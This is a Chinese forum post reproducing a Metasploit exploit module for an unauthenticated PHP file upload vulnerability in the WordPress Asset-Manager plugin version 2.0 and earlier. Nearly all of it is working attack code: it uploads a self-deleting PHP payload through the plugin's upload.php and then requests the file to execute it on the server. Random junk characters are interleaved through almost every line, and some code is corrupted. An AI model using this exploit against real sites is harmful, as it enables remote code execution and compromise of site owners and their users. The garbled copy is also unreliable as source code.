这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
5 u1 N+ T# I) C; Q6 E1 P
! u2 _ P) W1 ^9 S- P##( ~$ p2 Z Y6 ? S( w: b
# This file is part of the Metasploit Framework and may be subject to; {. o1 L) E: I/ X) W. T8 Z
# redistribution and commercial restrictions. Please see the Metasploit
/ y; R6 K$ A" F Z! l5 S& G# q# Framework web site for more information on licensing and terms of use.
8 T' e: q1 T/ W# http://metasploit.com/framework/
( g3 S% ` `7 m: h7 v##
( i1 O/ X6 I9 @8 Y ( ?* c/ {; k! |# g7 @ \
require 'msf/core'* E p9 l# j$ l5 \) X8 t
require 'msf/core/exploit/php_exe'3 C9 j. Q3 U% C6 E: V* n
& t1 B" Y7 ~* z
class Metasploit3 < Msf::Exploit::Remote# Y* t& ~$ Z0 N, }
Rank = ExcellentRanking
* C6 E- A5 ]" j h/ j0 p/ v 5 N7 ?( T. B5 o5 s* ?* f) E
include Msf::Exploit::Remote::HttpClient
% X* u/ Y8 c+ u" w3 H+ P p+ O include Msf::Exploit: hpEXE3 J. P. n; j, s0 q
% F+ x7 k# u S; I% G0 i
def initialize(info = {}): } r+ J! h- V0 I* [
super(update_info(info,
0 o# a- n8 O( p" f4 M) e 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',; ]4 E1 \2 I/ L7 }- f6 R
'Description' => %q{
- j6 X: u! m8 s+ n y This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress% H' i, E0 o# q5 I6 e3 a+ h
plugin. By abusing the upload.php file, a malicious user can upload a file to a' ~# o3 W6 z, a, O$ a6 h/ R/ M
temp directory without authentication, which results in arbitrary code execution.; Z' t# h, M5 `, ^
},2 W( T! P& l) s' _: g; _
'Author' =>
# C; I* L/ l& [% B& Z- L9 ` [# K0 \! r# A3 k) y! G" H. @$ `' A
'Sammy FORGIT', # initial discovery" O# V2 g( Y* U9 m6 U2 T2 Y
'James Fitts <fitts.james[at]gmail.com>' # metasploit module6 f9 \8 R) C: }! G8 ]; {
],
^! u+ S. |+ P$ O 'License' => MSF_LICENSE,3 D5 P: J! h4 J1 K2 i# [# _5 L
'References' =>
. \) F0 ?2 r6 v( b0 c [6 u, s! t+ Q3 ]
[ 'OSVDB', '82653' ],8 G% c- ]' y2 c. a. T
[ 'BID', '53809' ],
3 x# m, W) Y1 M) a- P" ^4 u [ 'EDB', '18993' ],
; {3 Z; l+ Q- I8 c [ 'URL', 'http:// www.myhack58.com /' ]0 F$ _" H3 Z1 i, o% W6 M" D
],
4 n* v D3 [( l3 F3 q 'Payload' =>8 S+ ^* t3 I- W' n Q
{
# f3 ]1 z. Z% E6 K( j 'BadChars' => "\x00",; C2 Q: O2 f% \- k, v, c! L
},
2 G# x4 U3 ^# I' t6 P% C 'Platform' => 'php',# U$ g, g+ r( ?
'Arch' => ARCH_PHP,
: `" d) ?! S2 Q 'Targets' =>, N9 l) B" O0 a
[
% Q4 [9 P/ r# K! Q/ E0 C2 i [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],6 k: v+ E3 S) k( q5 F" J6 t
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
7 B/ M9 |+ |% K8 |9 b ],
2 M& A% Z$ i9 h: D Z/ [ 'DefaultTarget' => 0,
3 i! i% ]; W( Q; \6 E$ L; g 'DisclosureDate' => 'May 26 2012'))
; R# N/ P. _7 w& H
6 u1 q% T: i+ t9 r6 o! A; Z' d+ r register_options(
8 L; u+ N1 U/ w5 [9 s3 M [
9 a: I! k5 J5 w7 l0 T/ l OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
' T1 a# ]% I3 K$ s ], self.class)
1 F8 J4 s& i/ h/ b end
y" X% b5 H* v0 g8 K% n # @) z$ D' L+ H9 c! |
def exploit
# U- x' _* \( C) H. G uri = target_uri.path( A3 _; s7 R; Y# n: l4 _3 z5 H0 ^
uri << '/' if uri[-1,1] != '/'. R* f" { t& J$ F# b
peer = "#{rhost}:#{rport}"
1 a2 e) c6 D+ A" P. [ payload_name = "#{rand_text_alpha(5)}.php"
- n* j5 k& E0 r# o' d s; @$ q php_payload = get_write_exec_payload(:unlink_self=>true)
7 ~0 J1 R3 N" D2 m2 e% ^ % U9 z4 P2 \: Q3 t7 B
data = Rex::MIME::Message.new% r# ^; n2 Y+ o* Q5 r" y
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
# o2 \3 z! G* @8 Z& S7 s post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')$ B) F" [4 v7 U- t- J( a
! Q* l! L1 k/ M7 B9 y
print_status("#{peer} - Uploading payload #{payload_name}")8 o7 s) }( b& i+ s4 Z$ t" P
res = send_request_cgi({& L8 A' }/ z/ z0 \& x
'method' => 'POST',, ?" ~0 m6 ^: }7 _
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
" V/ ]# s* d! T; @ H 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ D H& @2 a+ \% s0 a 'data' => post_data/ Q- _4 w( `5 {5 U3 Z
})
1 u/ u" r D# w* V1 Y/ I" z
$ _# w$ r9 U# G" R8 }/ [ if not res or res.code != 200 or res.body !~ /#{payload_name}// ]. H3 ~; R9 Z
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")5 n+ `/ ]" l* \4 b
end% b. g! H5 Y8 T) ~
+ U: n2 g" E1 E2 U print_status("#{peer} - Executing payload #{payload_name}")0 z7 H* B1 S$ F q T
res = send_request_raw({% B9 F3 [5 J0 T( c9 t
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
" i, i; h V; E9 v/ Y 'method' => 'GET'
5 ~( x- X# ~! }0 m' x3 |8 R })( }8 m( M# ]( A* X
7 ^6 i d, o0 a; U* k' m if res and res.code != 200
3 }. t/ K, N- @( H fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
( U7 p- E: k4 k. M# x) T end% D& x& A: f1 ?" z$ E1 [
end
7 L: j$ _$ g4 m* R8 J6 gend
b' R% D* N( |8 h |
发表于 2012-12-31 09:22:33
收藏
支持
反对